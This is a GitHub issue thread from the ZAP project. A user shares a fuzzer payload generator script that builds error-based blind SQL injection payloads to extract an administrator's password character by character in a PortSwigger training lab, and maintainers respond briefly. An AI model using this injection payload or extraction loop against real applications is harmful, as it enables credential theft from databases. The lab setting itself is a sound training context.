### ISSUE TITLE
How do I grab the response using a fuzz script?

### ISSUE THREAD

**Issue by TJ-C** [zaproxy/zaproxy#8609]
### Describe the bug

The script below extracts the password using SQLi.

How do I obtain the response 500, so that I can move on to the next char in the next function of the payload generator script shown below? More generally is there a way to search for any text in the response?

Is there a way to have the user populate some of the vars within fuzz?

**Payload generator script** 

``` js
// Auxiliary variables/constants for payload generation.
var NUMBER_OF_PAYLOADS = 20;
var INITIAL_VALUE = 1;
var count = INITIAL_VALUE;

// Define the username and the maximum length of the password to extract
var username = "admin"; // Change to the target username
var maxLength = 20; // Change to the maximum expected password length

// Define the character set to use for guessing the password
var possibleChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; // Add more characters if needed

var passwordLengthCount = 1
var charPosition = 0

/**
 * Returns the number of generated payloads, zero to indicate unknown number.
 * The number is used as a hint for progress calculations.
 * 
 * @return {number} The number of generated payloads.
 */
function getNumberOfPayloads() {
	return NUMBER_OF_PAYLOADS;
}

/**
 * Returns true if there are still payloads to generate, false otherwise.
 * 
 * Called before each call to next().
 * 
 * @return {boolean} If there are still payloads to generate.
 */
function hasNext() {
	return (passwordLengthCount <= NUMBER_OF_PAYLOADS);
}

/**
 * Returns the next generated payload.
 * 
 * This method is called while hasNext() returns true.
 * 
 * @return {string} The next generated payload.
 */
function next() {
  payload = getPayload(passwordLengthCount, possibleChars.charAt(charPosition));
  charPosition++
  if (charPosition > possibleChars.length) {
    passwordLengthCount++
    charPosition = 0
  }
    
  return payload

}

// Function to generate payloads for each character position
function getPayload(position, character) {
    return payload = "' || (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM users where username = 'administrator' AND SUBSTR(password,"+position+",1) = '"+character+"') || '";
}

/**
 * Resets the internal state of the payload generator, as if no calls to
 * hasNext() or next() have been previously made.
 * 
 * Normally called once the method hasNext() returns false and while payloads
 * are still needed.
 */
function reset() {
	count = INITIAL_VALUE;
}

/**
 * Releases any resources used for generation of payloads (for example, a file).
 * 
 * Called once the payload generator is no longer needed.
 */
function close() {
}
```

### Steps to reproduce the behavior

Go to portswigger's [lab](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors) 

### Expected behavior

Main goal: Only the response with the correct char is outputted in the Fuzzer window
Interim: Reduce the number of requests per password character.

### Software versions

Zap Version 2.15.0 on MacOS 14.6.1 (23G93)

### Would you like to help fix this issue?

- [X] Yes

**Comment by kingthorin** [comment]
Please don't ask questions as issues - the [ZAP User Group]( https://groups.google.com/group/zaproxy-users) is a much better place for questions.

---

In this case you'd probably have to leverage a httpfuzzprocessor script and set a Global var which the payload generator reads.
https://github.com/zaproxy/community-scripts/tree/main/httpfuzzerprocessor

**Comment by TJ-C** [comment]
Thanks, but the preprocessor cannot interact with the payload generator script and thus I can't brake out of the loop. 

Please reopen and set it to a feature request, because I don't believe the functionality I am asking for exists.

**Comment by kingthorin** [comment]
They can interact as was pointed out. You can have the processor set a global variable and have the generator read it:
https://www.zaproxy.org/docs/desktop/addons/script-console/#global-variables

Please move your usage question to the User Group.

**Comment by thc202** [comment]
The payload generator should just generate payloads, your logic should go into the fuzzer processor which can stop the fuzzing process any time.

**Comment by TJ-C** [comment]
I have tried to use the global values, but whilst setting the global value in the httpfuzzprocessor script 20 times, I only see this 9 times when I fetch the global value in the payload script. So there's some issue here.

This tells me that the actions of each script are independent and by that I mean the payload script doesn't run, then waits for the httpfuzzprocessor script to run before sending the next payload.

``` js

// Import the ScriptVars class
var ScriptVars = Java.type("org.zaproxy.zap.extension.script.ScriptVars");

function next() {
  if (ScriptVars.getGlobalVar("response") == 'true') {
    print(true)
  }
  ...
function processResult(utils, fuzzResult) {
  if (fuzzResult.getHttpMessage().getResponseHeader().getStatusCode().toString() == "500") {
        ScriptVars.setGlobalVar("response", "true");
        print("500")
        return true
   } 
   ...
```

As for the logic to be in the httpfuzzprocessor script, it won't work for blind SQLi as there is no data in the response. 

I am sending 1 of 62 characters in to a payload  and comparing the response to 500, if I get that, I have the first character of a 20 character password. Then I send another 62 payloads where I'm searching for the second char and looking for 500 response, and so it loops 20 times. (1240 requests in total)

I think at this point the functionality I'm looking for (reduce the number of request) is just not possible.

**Comment by kingthorin** [comment]
> As for the logic to be in the httpfuzzprocessor script, it won't work for blind SQLi as there is no data in the response.

Check the status not the actual response....

I'll be locking this issue. Please take your question to the User Group as previously instructed (multiple times).
